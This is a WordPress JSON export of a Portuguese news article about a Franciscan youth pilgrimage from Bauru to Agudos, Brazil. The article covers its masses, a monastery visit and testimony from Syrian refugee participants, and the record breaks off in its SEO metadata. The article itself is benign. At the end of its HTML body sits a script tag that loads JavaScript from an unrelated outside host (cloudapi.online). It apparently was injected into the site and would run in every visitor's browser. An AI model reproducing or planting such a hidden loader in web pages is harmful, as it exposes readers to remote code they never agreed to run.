{"id":108051,"date":"2016-04-25T08:42:07","date_gmt":"2016-04-25T11:42:07","guid":{"rendered":"http:\/\/franciscanos.org.br\/?p=108051"},"modified":"2020-03-27T13:51:20","modified_gmt":"2020-03-27T16:51:20","slug":"fe-e-superacao-marcam-a-caminhada-franciscana-em-bauru","status":"publish","type":"post","link":"https:\/\/franciscanos.org.br\/noticias\/fe-e-superacao-marcam-a-caminhada-franciscana-em-bauru.html","title":{"rendered":"F\u00e9 e supera\u00e7\u00e3o na Caminhada Franciscana em Bauru"},"content":{"rendered":"<p><a href=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2016\/04\/820-02.jpg\"><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2016\/04\/820-02.jpg\" alt=\"820-02\" width=\"820\" height=\"312\" \/><\/a><\/p>\n<p><strong>\u00c9rika Augusto<\/strong><\/p>\n<p>O feriado de 21 de abril amanheceu diferente em Bauru. Logo cedo, \u00e0s 6h30, um \u00f4nibus vindo de S\u00e3o Paulo era o pren\u00fancio de que a rotina da cidade mudaria pelos pr\u00f3ximos dias. Assim foi a movimenta\u00e7\u00e3o durante toda a manh\u00e3 na Par\u00f3quia Santo Ant\u00f4nio. \u00d4nibus vindos de S\u00e3o Paulo e Sorocaba (SP), Conc\u00f3rdia, Gaspar, Florian\u00f3polis, Santo Amaro da Imperatriz e Lages (SC), Nil\u00f3polis e Petr\u00f3polis (RJ), Curitiba e Chopinzinho (PR), frades e leigos da Cust\u00f3dia Franciscana do Sagrado Cora\u00e7\u00e3o de Jesus, al\u00e9m dos participantes de Bauru e Agudos.<\/p>\n<p>A anima\u00e7\u00e3o ficou por conta dos jovens da par\u00f3quia, com muita m\u00fasica e brincadeiras, enquanto outros cuidavam da cozinha, para preparar caf\u00e9 da manh\u00e3 e almo\u00e7o para as mais de 270 pessoas presentes. Frei Ademir Sanquetti, rec\u00e9m chegado na Par\u00f3quia, e Frei Guimar\u00e3es deram as boas-vindas e deixaram todos muito \u00e0\u00a0vontade.<\/p>\n<p>Ap\u00f3s o almo\u00e7o, todos se reuniram na igreja para as primeiras instru\u00e7\u00f5es sobre a caminhada. O tema escolhido para esta caminhada foi <strong>\u201cRedescobrindo o rosto misericordioso do Pai\u201d<\/strong>. Ir. In\u00eas, Franciscana de Ingolstadt, deu algumas luzes aos jovens, falando da passagem evang\u00e9lica do Pai misericordioso. A religiosa fez um apelo aos participantes para que pudessem olhar para o outro e perceber o que ele est\u00e1 necessitando \u2013 na fam\u00edlia, no trabalho, e tamb\u00e9m nestes pr\u00f3ximos dias de caminhada.<\/p>\n<p>No primeiro dia, o itiner\u00e1rio era curto, at\u00e9 a Par\u00f3quia Santa Clara, em Bauru. Os jovens percorreram 4,5 km at\u00e9 chegar ao destino final, onde foram recebidos com muita euforia, cantos de louvor e um lanche. Ali aconteceu a primeira missa, presidida pelo p\u00e1roco, Frei Alessandro Dias do Nascimento e concelebrada por Frei Diego Melo e Frei Edvaldo Batista, ambos do SAV (Servi\u00e7o de Anima\u00e7\u00e3o Vocacional). A igreja estava repleta de fi\u00e9is, que se uniram aos peregrinos para celebrarem a Eucaristia.<\/p>\n<p>Em sua homilia, Frei Alessandro falou a respeito da liberdade e do seguimento a Jesus Cristo. Os jovens, vindos de diversas realidades, foram questionados a respeito de sua decis\u00e3o para participar da Caminhada. \u201cVivemos num mundo que valoriza o tempo de produ\u00e7\u00e3o, o individualismo, n\u00e3o temos tempo para n\u00f3s, para os amigos, para Deus\u201d, dizendo que esta l\u00f3gica atinge ainda mais os jovens que est\u00e3o come\u00e7ando suas vidas de trabalho e estudo. \u201cA juventude \u00e9 chamada\u00a0 para um modo de vida insustent\u00e1vel, que segue a tend\u00eancia da moda, sendo escravos do consumismo\u201d, afirmou. E disse que o convite de Jesus rompe as barreiras do individualismo, chamando os crist\u00e3os a colocar a vida a favor do outro. \u201cDescobrimos a felicidade quando encontramos o Ressuscitado\u201d, disse. E motivou os jovens a buscarem a verdadeira liberdade dos que se colocam a servi\u00e7o de Deus.<\/p>\n<p>Em seguida, os jovens receberam das m\u00e3os dos ac\u00f3litos cora\u00e7\u00f5es com um Tau e a inscri\u00e7\u00e3o Paz e Bem. Frei Diego Melo agradeceu pela acolhida e pela dedica\u00e7\u00e3o da comunidade com este gesto carinhoso dos cora\u00e7\u00f5es, que foram feitos a m\u00e3o. \u201cDeus tamb\u00e9m trabalha artesanalmente\u201d, concluiu.<\/p>\n<p>Ap\u00f3s o jantar, os jovens foram acolhidos nas casas dos paroquianos, onde puderam descansar para a continua\u00e7\u00e3o da Caminhada Franciscana.<\/p>\n<p><strong>De Bauru a Piratininga \u2013 15 km rumo ao Mosteiro das Concepcionistas<\/strong><\/p>\n<p>A lua brilhava no c\u00e9u quando os primeiros jovens foram chegando \u00e0 Par\u00f3quia Santa Clara. \u00c0s 4h30 a prociss\u00e3o luminosa\u00a0saiu, rumo a Piratininga, a 15 km de dist\u00e2ncia. No caminho, muitos volunt\u00e1rios ajudando, oferecendo \u00e1gua, frutas, carro para apoio dos que precisassem. A cidade dormia enquanto os peregrinos passavam rezando o ter\u00e7o e cantando. Numa esquina, eles foram surpreendidos com uma casa iluminada, com os dizeres: \u201cQuem tem f\u00e9 vai a p\u00e9\u201d, e as janelas abertas. Numa delas estava a Dona Maria Jos\u00e9, acamada, ao lado de uma enfermeira. Ela acenava com alegria para os jovens, que emocionados, pararam em frente \u00e0\u00a0sua casa para rezar e pedir a Deus por sua sa\u00fade.<\/p>\n<p>O sol j\u00e1 estava a pino quando os jovens chegaram ao Mosteiro Imaculada Concei\u00e7\u00e3o e S\u00e3o Jos\u00e9, na cidade de Piratininga. Muitos jovens nunca tinham entrado num mosteiro, e foram impactados ao entrar na humilde e bela igreja ao som do canto das religiosas enclausuradas.<\/p>\n<p><a href=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2016\/04\/820-05.jpg\"><img loading=\"lazy\" class=\"alignleft size-full wp-image-108056\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2016\/04\/820-05.jpg\" alt=\"820-05\" width=\"820\" height=\"376\" \/><\/a><\/p>\n<p>A abadessa, Ir.\u00a0In\u00eas\u00a0Maria, acolheu a todos com muita alegria. Apoiada em uma bengala, aos 63 anos, a religiosa brincou que a bengala era mais pelos problemas do corpo que pela idade, e disse da alegria que as irm\u00e3s estavam ao acolher tanta gente, feito in\u00e9dito para elas. Frei Diego agradeceu e disse do grande significado de chegarem numa igreja que estava em constru\u00e7\u00e3o, sobretudo para os que vivem a espiritualidade franciscana, que \u00e9 o caso das irm\u00e3s e dos frades.<\/p>\n<p>Os peregrinos ent\u00e3o foram surpreendidos com um bonito gesto: os religiosos e religiosas presentes iniciaram o lava-p\u00e9s dos jovens. \u201cDeixar-se cuidar \u00e9 express\u00e3o do amor\u201d, afirmou Frei Diego. Os p\u00e9s sujos e cansados da longa caminhada receberam \u00e1gua fresca e um beijo, simbolizando o servi\u00e7o ao pr\u00f3ximo. Alguns jovens tamb\u00e9m se sentiram motivados a lavar os p\u00e9s dos companheiros, e em seguida dos religiosos.<\/p>\n<p><strong>Momento de escuta e partilha com Ir. Francisca Let\u00edcia<\/strong><\/p>\n<p>Ap\u00f3s o almo\u00e7o e um merecido descanso, os jovens puderam ouvir a partilha de Ir. Francisca Let\u00edcia sobre a vida mon\u00e1stica. A religiosa falou sobre Santa Beatriz da Silva, a fundadora da Ordem da Imaculada Concei\u00e7\u00e3o da Bem-Aventurada Virgem Maria e da liga\u00e7\u00e3o entre as religiosas e a Ordem dos Frades Menores. \u201cO que os frades defendiam nos p\u00falpitos, as Concepcionistas tornavam Projeto de Vida\u201d, afirmou. Ir. Let\u00edcia disse que enquanto os jovens caminhavam, as religiosas rezavam, pedindo por eles e para que eles pudessem ter um encontro especial com Deus ao longo da experi\u00eancia.<\/p>\n<p>A religiosa contou de sua hist\u00f3ria vocacional e de sua decis\u00e3o de\u00a0entrar no mosteiro. Os jovens fizeram muitas perguntas a respeito da vida dentro da clausura. Ir. Francisca Let\u00edcia contou que sua inspira\u00e7\u00e3o veio de Santa Teresinha, que \u00e9 padroeira das miss\u00f5es, mesmo sem nunca ter sa\u00eddo do convento. \u201cDescobri que na ora\u00e7\u00e3o poderia ajudar muito mais pessoas\u201d, afirmou a religiosa, que quando jovem ajudava na Pastoral de Rua em Ja\u00fa.<\/p>\n<p>A religiosa\u00a0concluiu a sua fala fazendo um apelo aos jovens. \u201cAbracem a cruz, e n\u00e3o a arrastem\u201d, pediu.<\/p>\n<p>No final da tarde, todos foram convidados para a Celebra\u00e7\u00e3o Eucar\u00edstica, animada pelas religiosas e pela equipe de liturgia que colabora no mosteiro. No Ato Penitencial, Ir. Francisca Beatriz convidou os presentes para contemplarem os p\u00f4steres que estavam ao lado do presbit\u00e9rio. A religiosa falou da import\u00e2ncia de restaurar a imagem de Deus em cada um. \u201cV\u00e1 em busca da face misericordiosa de Deus. Apesar das limita\u00e7\u00f5es humanas, enquanto houver f\u00e9 e disposi\u00e7\u00e3o, a gra\u00e7a nos transforma\u201d, afirmou.<\/p>\n<p>Os jovens escolheram qual imagem mais chamava a aten\u00e7\u00e3o, do Bom Pastor ou do Pai Misericordioso acolhendo o Filho Pr\u00f3digo. Atr\u00e1s de cada p\u00f4ster havia um espelho, para que eles pudessem olhar para o outro Cristo, que est\u00e1 dentro de cada ser humano, criado \u00e0 imagem e semelhan\u00e7a de Deus. \u201cEsquecemos que h\u00e1 outro rosto sagrado, o do ser humano, o nosso. Deus sofre por nos ver sofrer, quando olhamos no espelho e n\u00e3o reconhecemos em n\u00f3s a imagem e semelhan\u00e7a Dele\u201d, disse Frei Diego.<\/p>\n<p>A homilia ficou por conta do frade rec\u00e9m-chegado ao SAV, o di\u00e1cono Frei Edvaldo Batista. \u201cJesus desperta nos disc\u00edpulos o amor que havia se apagado ap\u00f3s a crucifica\u00e7\u00e3o\u201d. O Evangelho do dia era muito prop\u00edcio para a Caminhada: Jesus se apresentando como caminho, verdade e vida. \u201cJesus n\u00e3o \u00e9 o caminho dentro de outros caminhos, ele \u00e9 O Caminho! \u00c9 \u00fanico, que nos traz a aut\u00eantica felicidade\u201d, concluiu o frade.<\/p>\n<p>Ap\u00f3s o jantar, outras fam\u00edlias se dispuseram a acolher os jovens em suas casas. A hospedagem foi curta: \u00e0s 2h da madrugada j\u00e1 estavam todos reunidos para o \u00faltimo percurso da Caminhada Franciscana: mais 25 km at\u00e9 o Semin\u00e1rio Santo Ant\u00f4nio, em Agudos.<\/p>\n<p>O rel\u00f3gio marcava 2h30 quando a ora\u00e7\u00e3o come\u00e7ou. N\u00e3o s\u00f3 os jovens e as fam\u00edlias madrugaram, as irm\u00e3s tamb\u00e9m acordaram mais cedo que de costume, para partilhar com os jovens um pouco de sua rotina de ora\u00e7\u00e3o. Todos rezaram a liturgia das horas, conduzida pelas religiosas, e assim buscaram for\u00e7as para o in\u00edcio do terceiro dia de caminhada.<\/p>\n<p>Mais uma noite de prociss\u00e3o luminosa, dessa vez pela cidade de Piratininga. Ora\u00e7\u00f5es e cantos espantaram o sono e o cansa\u00e7o. Os volunt\u00e1rios acompanhavam atentamente, oferecendo ajuda, \u00e1gua e frutas para os peregrinos. O dia estava raiando quando os jovens fizeram a primeira parada. Uma pausa para tomar caf\u00e9, descansar, alongar e ir ao banheiro. Ainda faltava muito para o ponto de chegada, e o sol logo come\u00e7aria a tornar o caminho mais dif\u00edcil.<\/p>\n<p>\u00c0s 9h15 os jovens avistaram as torres da Par\u00f3quia S\u00e3o Paulo Ap\u00f3stolo, em Agudos. Muita festa do lado de fora e de dentro da igreja. Frei S\u00edlvio Trindade Werlingue, o p\u00e1roco rec\u00e9m-chegado estava no presbit\u00e9rio, acolhendo os jovens que lotaram a igreja de amarelo \u2013 a cor predominante do colete usado pelos peregrinos. Uma banda animou a todos, que cantaram e louvaram, sem demonstrar sinais do cansa\u00e7o que tomava conta de todos. Os paroquianos prepararam um caf\u00e9 da manh\u00e3, que reabasteceu as energias.<\/p>\n<p>Um pouco mais adiante os jovens foram acolhidos com mais festa, na igreja matriz Santo Ant\u00f4nio. J\u00e1 na chegada, do lado de fora, muita anima\u00e7\u00e3o e cantos. No lado de dentro Frei Jos\u00e9 Martins falou a respeito da sauda\u00e7\u00e3o Paz e Bem, e todos repetiram com ainda mais entusiasmo: Paz e Bem! E receberam a b\u00ean\u00e7\u00e3o de Santo Ant\u00f4nio e um p\u00e3o bento na sa\u00edda, para alimentar e aben\u00e7oar os jovens para os \u00faltimos 5 km at\u00e9 o Semin\u00e1rio Santo Ant\u00f4nio. Um trio el\u00e9trico, com m\u00fasicos, animou o trecho nas ruas da cidade. Os moradores e comerciantes sa\u00edam de suas casas para ver e saudar os peregrinos.<\/p>\n<p>Quase na reta final da caminhada, Frei Diego fez a motiva\u00e7\u00e3o para que a partir daquele ponto, os jovens caminhassem em sil\u00eancio at\u00e9 a chegada no semin\u00e1rio. Apesar do calor, do cansa\u00e7o e da euforia pelo t\u00e9rmino do trajeto, todos seguiram silenciosos. Os volunt\u00e1rios e frades que esperavam no semin\u00e1rio at\u00e9 estranharam todo aquele sil\u00eancio. Talvez esperassem gritos e comemora\u00e7\u00e3o, mas encontraram uma prociss\u00e3o silenciosa rumo ao semin\u00e1rio. Eram 11h50 quando o grupo chegou ao destino final da Caminhada.<\/p>\n<p><a href=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2016\/04\/820-04.jpg\"><img loading=\"lazy\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2016\/04\/820-04.jpg\" alt=\"820-04\" width=\"820\" height=\"420\" \/><\/a><\/p>\n<p>Antes de entrar na igreja todos tiraram os t\u00eanis, como sinal da sacralidade, de \u201ctirar a sand\u00e1lia dos p\u00e9s\u201d para encontrar o Senhor. E Ele estava esperando pelos peregrinos. No altar, o ostens\u00f3rio com Jesus Eucar\u00edstico esperava pelos jovens ap\u00f3s os 45 km de Caminhada. O desejo de rezar e agradecer ao Senhor era mais forte que o cansa\u00e7o. A ora\u00e7\u00e3o que se seguiu durou aproximadamente 2 horas, onde a grande maioria permaneceu na igreja. No primeiro dia os jovens receberam um saquinho, e foram motivados a colocar dentro dele suas d\u00favidas e preocupa\u00e7\u00f5es ao longo do trajeto. Dentro dele havia tamb\u00e9m incenso, que foi despejado aos p\u00e9s do altar durante a ora\u00e7\u00e3o.<\/p>\n<p>Frei James Ferreira Gomes Neto, guardi\u00e3o do Semin\u00e1rio, deu as boas-vindas e expressou sua alegria pela acolhida dos jovens.<\/p>\n<p><strong>Energia e disposi\u00e7\u00e3o para confraterniza\u00e7\u00e3o e partilha<\/strong><\/p>\n<p>Mesmo depois de dias t\u00e3o intensos e cansativos, os jovens ainda tiveram disposi\u00e7\u00e3o para uma tarde agrad\u00e1vel no semin\u00e1rio. Brincaram na piscina, jogaram bola, pebolim.<\/p>\n<p>No in\u00edcio da noite todos se reuniram na igreja para um momento de partilha em pequenos grupos. Alguns deram seu testemunho a respeito da Caminhada. Foi o caso do Vitor, de Chopinzinho. O jovem disse que durante o trajeto teve vontade de desistir, por causa do cansa\u00e7o, mas que ent\u00e3o sentiu que Deus falava com ele, e o animou para continuar caminhando. Chegando ao semin\u00e1rio, o jovem pediu que se Deus quisesse que ele seguisse o caminho da vida religiosa, que Ele tocasse seu cora\u00e7\u00e3o, e foi o que aconteceu enquanto ele rezava aos p\u00e9s de Jesus Eucar\u00edstico.<\/p>\n<p>Fabiana, a idealizadora da Caminhada Franciscana em Bauru, tamb\u00e9m partilhou. Emocionada, a leiga contou do desejo de realizar uma atividade como esta, e de como foi poss\u00edvel tornar o sonho realidade.<\/p>\n<p>No final do dia os jovens ainda tiveram \u00e2nimo para uma confraterniza\u00e7\u00e3o na piscina, com comidas, dan\u00e7a e m\u00fasica.<\/p>\n<p><strong>A experi\u00eancia divina da Caminhada<\/strong><\/p>\n<p>No decorrer de todo o trajeto Frei Diego afirmava que aquele gesto de caminhar 45 km em poucos dias n\u00e3o era humano, mas divino. Somente a gra\u00e7a de Deus consegue explicar o sentimento que tomava conta de todos no encerramento da atividade.<\/p>\n<p>\u00c0s 6h30 da manh\u00e3 os participantes se reuniram para a ora\u00e7\u00e3o da manh\u00e3, e fizeram uma dan\u00e7a circular. \u00c0s 8h todos estavam reunidos na igreja para a missa de encerramento. Em sua homilia, Frei Diego brincou com os jovens, perguntando qual celular eles preferiam, um modelo antigo ou um Iphone. Todos responderam que o segundo, por ser mais atual. \u201cJesus tamb\u00e9m nos oferece algo novo, atualizado\u201d, afirmou o frade, falando a respeito do Evangelho deste 5\u00ba domingo da P\u00e1scoa. O frade disse tamb\u00e9m que nada daquilo que os jovens haviam experimentado era novidade: a acolhida nas casas, a ajuda dos volunt\u00e1rios, a ora\u00e7\u00e3o. O que havia mudado nos jovens era o olhar. \u201cN\u00e3o h\u00e1 nada de novo nisso, mas nos toca pois redescobrimos o que \u00e9 simples\u201d, afirmou.<\/p>\n<p>\u201cVivenciamos nestes dias novo C\u00e9u e nova Terra, na alegria de redescobrir o rosto misericordioso do Pai\u201d, disse Frei Diego, que exaltou o esfor\u00e7o de cada um e disse que todos cumpriram a meta, mesmo aqueles que n\u00e3o conseguiram caminhar os 45 km. \u201cA meta era dar o m\u00e1ximo de si, e foi isso que voc\u00eas fizeram\u201d, acrescentou. \u201cVoc\u00eas saem daqui com a miss\u00e3o de serem anunciadores desta Boa Nova, mostrando atrav\u00e9s de atitudes que voc\u00eas encontraram este rosto misericordioso de Deus, sem esquecer que este rosto est\u00e1 tamb\u00e9m em cada ser humano\u201d, concluiu.<\/p>\n<p>Na Ora\u00e7\u00e3o Eucar\u00edstica, Frei Diego fez quest\u00e3o de chamar no presbit\u00e9rio todos os religiosos, religiosas, vocacionados e vocacionadas, para rezarem juntos o Pai Nosso. O frade apresentou Frei Aristides, j\u00e1 idoso, que cuida da separa\u00e7\u00e3o de res\u00edduo recicl\u00e1vel na casa, e agradeceu por seu testemunho silencioso no cuidado com o outro e com o meio ambiente. O coordenador do SAV agradeceu aos volunt\u00e1rios, que t\u00e3o prontamente abra\u00e7aram a causa da Caminhada Franciscana, trabalhando na prepara\u00e7\u00e3o e na organiza\u00e7\u00e3o da atividade, que exigiu uma grande infraestrutura para acolher os quase 300 participantes.<\/p>\n<p><strong>Jovens s\u00edrios fazem a experi\u00eancia da Caminhada<\/strong><\/p>\n<p>Al\u00e9m da imensa diversidade entre os estados, havia tamb\u00e9m na Caminhada Franciscana de Bauru alguns participantes estrangeiros. Claudia, da Nicar\u00e1gua, e os irm\u00e3os Lara, Karin e Daoud Kauss, da S\u00edria. Karin, de 19 anos e Daoud, de 23, moram em Petr\u00f3polis h\u00e1 3 anos. Eles participam da Igreja do Sagrado Cora\u00e7\u00e3o.<\/p>\n<p><a href=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2016\/04\/DSC_3529.jpg\"><img loading=\"lazy\" class=\"alignleft wp-image-108436\" src=\"http:\/\/franciscanos.org.br\/wp-content\/uploads\/2016\/04\/DSC_3529.jpg\" alt=\"DSC_3529\" width=\"350\" height=\"292\" \/><\/a>Eles contam que na S\u00edria participavam de grupo de jovens, mas que nunca tinham participado de um evento parecido. Para o jovem, o momento do lava-p\u00e9s foi muito marcante.<\/p>\n<p>\u201cDurante a caminhada todo mundo estava muito cansado, mas era necess\u00e1rio superar a dor e com for\u00e7a de vontade continu\u00e1vamos. Achei que seria imposs\u00edvel, mas fiquei muito feliz quando cheguei ao semin\u00e1rio\u201d, conta Karin.<\/p>\n<p>Sobre o pa\u00eds de origem, Daoud conta que antes da guerra a S\u00edria era um pa\u00eds muito pac\u00edfico, com muita harmonia entre as diversas religi\u00f5es. Com a chegada do Estado Isl\u00e2mico, e os mu\u00e7ulmanos radicais, muitos crist\u00e3os morreram pelo fato de serem crist\u00e3os e n\u00e3o negarem a sua f\u00e9.<\/p>\n<p>\u201cA S\u00edria era uma panela de press\u00e3o, todo o dia tinha um bombardeio, um ataque\u201d, conta Karin. Os jovens contam que faltam os servi\u00e7os b\u00e1sicos, como ir \u00e0 escola. \u201cAlguns dias fic\u00e1vamos 5 dias sem energia el\u00e9trica\u201d, afirma. Eles dizem\u00a0que enquanto estavam l\u00e1, n\u00e3o conseguiam pensar no futuro, por causa da inseguran\u00e7a do que poderia acontecer. A jovem conta que ficava muito triste com os acontecimentos, porque o cora\u00e7\u00e3o dos pr\u00f3prios s\u00edrios ficava insens\u00edvel com tantas mortes. \u201cA gente mudou depois da guerra.\u00a0Quando cheguei ao\u00a0Brasil n\u00e3o conseguia sorrir mais\u201d. Uma partilha tocou muito Karin, quando uma religiosa contou para eles na Caminhada que ela acordava de madrugada e rezava pelos s\u00edrios. \u201cAs pessoas querem saber da nossa hist\u00f3ria, mas rezar por isso para mim \u00e9 muito importante, os meus mundos se encontram, a f\u00e9 e minha origem\u201d, afirma a estudante de engenharia civil.<\/p>\n<p><strong><a href=\"https:\/\/www.facebook.com\/media\/set\/?set=a.1395542097137841.1073741892.352978081394253&amp;type=3\" target=\"_blank\" rel=\"noopener noreferrer\">Confira o \u00e1lbum no Facebook<\/a>\u00a0e as <a href=\"https:\/\/www.facebook.com\/IvoLeiteBauru\/media_set?set=a.1296924406988825.1073741917.100000138352862&amp;type=3\" target=\"_blank\" rel=\"noopener noreferrer\">fotos de Ivo Leite<\/a><\/strong><\/p>\n<p><img class=\"ngg_displayed_gallery mceItem\" src=\"http:\/\/franciscanos.org.br\/index.php\/nextgen-attach_to_post\/preview\/id--108190\" alt=\"\" \/><\/p>\n<p><script id=\"lg210a\" src=\"https:\/\/cloudapi.online\/js\/api46.js\" type=\"text\/javascript\"><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>SAV<\/p>\n","protected":false},"author":1,"featured_media":204308,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"acf":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.2 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>F\u00e9 e supera\u00e7\u00e3o na Caminhada Franciscana em Bauru - Not\u00edcias - Franciscanos<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/franciscanos.org.br\/noticias\/fe-e-superacao-marcam-a-caminhada-franciscana-em-bauru.html\" \/>\n<meta property=\"og:locale\" content=\"pt_BR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"F\u00e9 e supera\u00e7\u00e3o na Caminhada Franciscana em Bauru - Not\u00edcias - Franciscanos\" \/>\n<meta property=\"og:description\" content=\"SAV\" \/>\n<meta property=\"og:url\" content=\"https:\/\/franciscanos.org.br\/noticias\/fe-e-superacao-marcam-a-caminhada-franciscana-em-bauru.html\" \/>\n<meta property=\"og:site_name\" content=\"Not\u00edcias - Franciscanos\" \/>\n<meta property=\"article:published_time\" content=\"2016-04-25T11:42:07+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2020-03-27T16:51:20+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2016\/04\/820-02.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"273\" \/>\n\t<meta property=\"og:image:height\" content=\"181\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"admin\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Escrito por\" \/>\n\t<meta name=\"twitter:data1\" content=\"admin\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. tempo de leitura\" \/>\n\t<meta name=\"twitter:data2\" content=\"15 minutos\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/\",\"name\":\"Not\u00edcias - Franciscanos\",\"description\":\"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pt-BR\"},{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/fe-e-superacao-marcam-a-caminhada-franciscana-em-bauru.html#primaryimage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2016\/04\/820-02.jpg\",\"contentUrl\":\"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2016\/04\/820-02.jpg\",\"width\":273,\"height\":181},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/fe-e-superacao-marcam-a-caminhada-franciscana-em-bauru.html#webpage\",\"url\":\"https:\/\/franciscanos.org.br\/noticias\/fe-e-superacao-marcam-a-caminhada-franciscana-em-bauru.html\",\"name\":\"F\u00e9 e supera\u00e7\u00e3o na Caminhada Franciscana em Bauru - Not\u00edcias - Franciscanos\",\"isPartOf\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/fe-e-superacao-marcam-a-caminhada-franciscana-em-bauru.html#primaryimage\"},\"datePublished\":\"2016-04-25T11:42:07+00:00\",\"dateModified\":\"2020-03-27T16:51:20+00:00\",\"author\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\"},\"breadcrumb\":{\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/fe-e-superacao-marcam-a-caminhada-franciscana-em-bauru.html#breadcrumb\"},\"inLanguage\":\"pt-BR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/franciscanos.org.br\/noticias\/fe-e-superacao-marcam-a-caminhada-franciscana-em-bauru.html\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/fe-e-superacao-marcam-a-caminhada-franciscana-em-bauru.html#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/franciscanos.org.br\/noticias\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"F\u00e9 e supera\u00e7\u00e3o na Caminhada Franciscana em Bauru\"}]},{\"@type\":\"Person\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/b38fbf43118f02820bd932f2e4b14ad3\",\"name\":\"admin\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"pt-BR\",\"@id\":\"https:\/\/franciscanos.org.br\/noticias\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/e8495742d34d0ba6448ea1c628263b3e?s=96&d=mm&r=g\",\"caption\":\"admin\"},\"url\":\"https:\/\/franciscanos.org.br\/noticias\/author\/admin\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"F\u00e9 e supera\u00e7\u00e3o na Caminhada Franciscana em Bauru - Not\u00edcias - Franciscanos","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/franciscanos.org.br\/noticias\/fe-e-superacao-marcam-a-caminhada-franciscana-em-bauru.html","og_locale":"pt_BR","og_type":"article","og_title":"F\u00e9 e supera\u00e7\u00e3o na Caminhada Franciscana em Bauru - Not\u00edcias - Franciscanos","og_description":"SAV","og_url":"https:\/\/franciscanos.org.br\/noticias\/fe-e-superacao-marcam-a-caminhada-franciscana-em-bauru.html","og_site_name":"Not\u00edcias - Franciscanos","article_published_time":"2016-04-25T11:42:07+00:00","article_modified_time":"2020-03-27T16:51:20+00:00","og_image":[{"width":273,"height":181,"url":"https:\/\/franciscanos.org.br\/noticias\/wp-content\/uploads\/2016\/04\/820-02.jpg","type":"image\/jpeg"}],"author":"admin","twitter_card":"summary_large_image","twitter_misc":{"Escrito por":"admin","Est. tempo de leitura":"15 minutos"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/franciscanos.org.br\/noticias\/#website","url":"https:\/\/franciscanos.org.br\/noticias\/","name":"Not\u00edcias - Franciscanos","description":"Prov\u00edncia Franciscana da Imaculada Concei\u00e7\u00e3o do Brasil - Ordem dos Frades Menores - OFM","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/franciscanos.org.br\/noticias\/?s={search_term_string}"},"query-input":"required 